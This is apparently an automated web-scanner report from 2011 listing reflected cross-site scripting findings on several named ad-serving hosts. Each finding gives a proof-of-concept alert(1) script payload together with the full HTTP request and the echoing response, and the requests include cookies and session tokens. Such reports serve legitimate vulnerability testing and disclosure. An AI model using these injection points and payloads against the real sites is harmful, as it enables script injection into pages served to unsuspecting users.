GET /st?pfm=1&ttch=ch&tgdg=ch&titn=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=62870&ad_type=ad§ion=1426204&ad_size=728x90&8b37d"-alert(1)-"45e6ab6a264=1 HTTP/1.1 Host: ad.technoratimedia.com Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/top_728_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TVER=8; TMEDIA=Coun%3ANA%2FPostal%3ANA%2F; TMEDIACATS2=%5E38%5E%3A%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C19%2F%5E44%5E%3A%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C%2D1%2C19; TMEDIAUUID=015310CD%2D0616%2D46BE%2DB1EA143CC96AEC60
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:26:17 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 20 Mar 2011 17:26:17 GMT Pragma: no-cache Content-Length: 4413 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?8b37d"-alert(1)-"45e6ab6a264=1&Z=728x90&atf=1&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1426204&tgdg=ch&titn=ch&ttch=ch&uatRandNo=62870&_salt=3992706049";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';i ...[SNIP]...
4.44. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf7e"-alert(1)-"a56ead6dc0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600§ion=674716&bur=75598&x=http://www.burstnet.com/ads/ad16597a-map.cgi/BCPG175405.254264.267318/VTS=2RFkT._GgX/K=ADS_T150/SZ=120X600A|160X600A/V=2.3S//REDIRURL=&7cf7e"-alert(1)-"a56ead6dc0c=1 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=87d2451c-50fd-11e0-8afd-003048d6d22e&_hmacv=1&_salt=327327191&_keyid=k1&_hmac=87cfa58169cdc261fd30bf9c1633447993c7cde2; pv1="b!!!!-!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!#`ac!$5*F!$i@e!0oZP!%GRx!!H<)!?5%!$qXJ3!@Dj0!'NRE~~~~~~~<qc=9<sGhr!!!([!!Rl,!!E)$!$XwU!0pbc!$so$!#a.3!!,)#%5tS5!]7:6!%4=%!%g*F~~~~~~<qd6K<smWP!!!([!!v#F#IxPE!$Wiw!(^yZ!#PIK!!!%%!?5%!$px$-!w1K*!%0]Y!%7E2!$/h8~~~~~<rmNa~~"; bh="b!!!%$!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!-?2!!!!*<pN)4!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!04Z!!!!#<qgdp!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!xV'!!!!#<qBrC!!xV=!!!!#<qBs(!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!#<re$l!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#*Xa!!!!#<rao$!#*Xb!!!!#<r)hx!#*Xc!!!!#<r)hx!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#K?^!!!!'<p_19!#Km+!!!!#<qppS!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=(!!!!#<piFJ!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f__!!!!#<pd^@!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!#<rmV9!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!#<rmV:!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; ih="b!!!!R!%?RR!!!!'<rmNX!%?Rl!!!!%<rmNX!%?m7!!!!#<p]i+!'4A7!!!!%<rmNV!'4A9!!!!%<rmNV!(4uP!!!!#<p^*H!(^yZ!!!!#<rmNa!)AU7!!!!#<pN(R!*rnf!!!!#<pv/a!+%qt!!!!#<roWO!,+ZH!!!!#<o,,>!,?Kj!!!!$<pN)1!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.$Cj!!!!#<qc=8!.$Cr!!!!#<qc=7!.L'V!!!!#<rasm!.SpC!!!!#<rat%!.`'5!!!!$<qd6G!.`.T!!!!#<rAKN!.`.U!!!!#<o'YF!0(6l!!!!#<p]b^!0.2@!!!!#<pqfN!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0S3y!!!!#<qd4F!0cn'!!!!#<q*ty!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg!0eUu!!!!#<qn]D!0oZP!!!!#<qc=9!0pbc!!!!$<qd6K!0vr,!!!!$<raoq!1%3H!!!!#<qc=7!1(-6!!!!#<rmN+!1/X3!!!!(<rmb3!1/X6!!!!)<rmb2!1/]r!!!!(<rmb3!104d!!!!#<qn]E!1:dV!!!!#<rmMp"; vuday1=[cdPJI7PHzX9H4W4d=[p1[Y'G!3w>8BIdqh; BX=6l13v316lnh2l&b=4&s=8i&t=47; liday1=8eD/sfr=wM!!o(>l-VP:9.<FK!3w>8iPO%U
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:25:56 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 20 Mar 2011 17:25:56 GMT Pragma: no-cache Content-Length: 5211 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?7cf7e"-alert(1)-"a56ead6dc0c=1&Z=160x600&bur=75598&s=674716&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad16597a%2dmap.cgi%2fBCPG175405.254264.267318%2fVTS%3d2RFkT.%5fGgX%2fK%3dADS%5fT150%2fSZ%3d120X600A%7c160X600A%2fV%3d2.3S%2f%2fRE ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 315ee<script>alert(1)</script>f72375c49d4 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=0xIawmmrsYYagWK1_6772529315ee<script>alert(1)</script>f72375c49d4 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?n3caAJxLCgAxV2cAAAAAAFbVDwAAAAAAAAAQAAoAAAAAABAAAQABDdL2EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD2TgUAAAAAAAIAAQAAAAAAAAAAAAAA-D8AAAAAAAD4PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACU5zluMBzPCfyPAYJZwS-weB2tSCNbGpLI1FFnAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D,http%3A%2F%2Ftechie-buzz.com%2F%3Fref%3Dlogo,Z%3D160x600%26bur%3D93455%26s%3D674716%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad16597a%252dmap.cgi%252fBCPG175405.254264.267318%252fVTS%253d2RFlO.3dTL%252fK%253dADS%255fT150%252fSZ%253d120X600A%257c160X600A%252fV%253d2.3S%252f%252fREDIRURL%253d%26_salt%3D4137244318%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252F%253Fref%253Dlogo%26r%3D0,8bf33f3c-5316-11e0-841b-003048d6d1c8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A96D224D3326D49C0D5BFDEEC19E8ADD; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 20 Mar 2011 17:26:47 GMT Connection: close
The value of the et request parameter is copied into an HTML comment. The payload 948da--><script>alert(1)</script>b81f0b3d616 was submitted in the et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads?rt=2&et=1948da--><script>alert(1)</script>b81f0b3d616&bi=46019&se=m&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1 Host: ads.newtention.net Proxy-Connection: keep-alive Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:54:23 GMT Content-Type: text/html Content-Length: 294 P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT" Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head></head> <body style="margin:0; padding:0;"> <!-- Not supported event type (1948da--><script>alert(1)</script>b81f0b3d616)! AdServer: app09 --> ...[SNIP]...
The value of the rt request parameter is copied into an HTML comment. The payload 25d7e--><script>alert(1)</script>022e12d8c56 was submitted in the rt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads?rt=225d7e--><script>alert(1)</script>022e12d8c56&et=1&bi=46019&se=m&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1 Host: ads.newtention.net Proxy-Connection: keep-alive Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:54:23 GMT Content-Type: text/html Content-Length: 296 P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT" Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head></head> <body style="margin:0; padding:0;"> <!-- Not supported request type (225d7e--><script>alert(1)</script>022e12d8c56)! AdServer: app09 --> ...[SNIP]...
The value of the se request parameter is copied into an HTML comment. The payload 1f60d--><script>alert(1)</script>0d94a310df2 was submitted in the se parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads?rt=2&et=1&bi=46019&se=m1f60d--><script>alert(1)</script>0d94a310df2&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1 Host: ads.newtention.net Proxy-Connection: keep-alive Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:54:24 GMT Content-Type: text/html Content-Length: 307 P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT" Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head></head> <body style="margin:0; padding:0;"> <!-- Server parameter value is not supported: m1f60d--><script>alert(1)</script>0d94a310df2 AdServer: app04 --> ...[SNIP]...
The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload a2ace<script>alert(1)</script>2df88929d80 was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ag.asp?cc=a2ace<script>alert(1)</script>2df88929d80&source=js&ord=1247160529 HTTP/1.1 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/abmOQK1UJ90aynSr3HUrB0WtFUmb7rRUvrYqQt3TZbh4qrYmEMAYbjbUHfVoPfJmGnooWvJ3EMf3tes3A7ZdmFUZcYcrTYGZbV0cfNpTF42bQRTFfZcWAYWQTb2SsQMQdZbxYt7qVP3u2GB3XbBIU6qr5mUeRmfF3tBMXHJJmdAo3938fIhilL/2448066/adTag.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 293 Content-Type: text/html Expires: Sun, 20 Mar 2011 17:25:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSa2ace%3Cscript%3Ealert%281%29%3C%2Fscript%3E2df88929d800=uid=9248110; expires=Mon, 21-Mar-2011 17:26:08 GMT; path=/ Set-Cookie: FSa2ace%3Cscript%3Ealert%281%29%3C%2Fscript%3E2df88929d80=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4096&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Wed, 20-Apr-2011 17:26:08 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sun, 20 Mar 2011 17:26:07 GMT Connection: close
The value of the partner_key request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ba'%3balert(1)//5a0c330758a was submitted in the partner_key parameter. This input was echoed as 457ba';alert(1)//5a0c330758a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /button.js?partner_key=04e77fc8cc74396e5f52b887dd10171a457ba'%3balert(1)//5a0c330758a&token=quova13006323844d861340674da HTTP/1.1 Host: assets.truvie.com Proxy-Connection: keep-alive Referer: http://www.quova.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 14:50:48 GMT Server: Apache/2.2.16 (Fedora) Connection: close Content-Type: text/javascript Content-Length: 7278
/*global document, window, escape */ var agt = window.navigator.userAgent.toLowerCase(); var opera = agt.indexOf('opera') !== -1; var ie = agt.indexOf('msie') !== -1; var ns = window.navigator.app ...[SNIP]... <param name="movie" value="http://04e77fc8cc74396e5f52b887dd10171a457ba';alert(1)//5a0c330758a-quova13006323844d861340674da.assets.truvie.com/movie.swf?q=partner_key%3D04e77fc8cc74396e5f52b887dd10171a457ba%2527%253Balert%25281%2529%252F%252F5a0c330758a%26token%3Dquova13006323844d861340674da&por ...[SNIP]...
The value of the token request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dbd'%3balert(1)//5b2336207c5 was submitted in the token parameter. This input was echoed as 13dbd';alert(1)//5b2336207c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /button.js?partner_key=04e77fc8cc74396e5f52b887dd10171a&token=quova13006323844d861340674da13dbd'%3balert(1)//5b2336207c5 HTTP/1.1 Host: assets.truvie.com Proxy-Connection: keep-alive Referer: http://www.quova.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 14:50:49 GMT Server: Apache/2.2.16 (Fedora) Connection: close Content-Type: text/javascript Content-Length: 7246
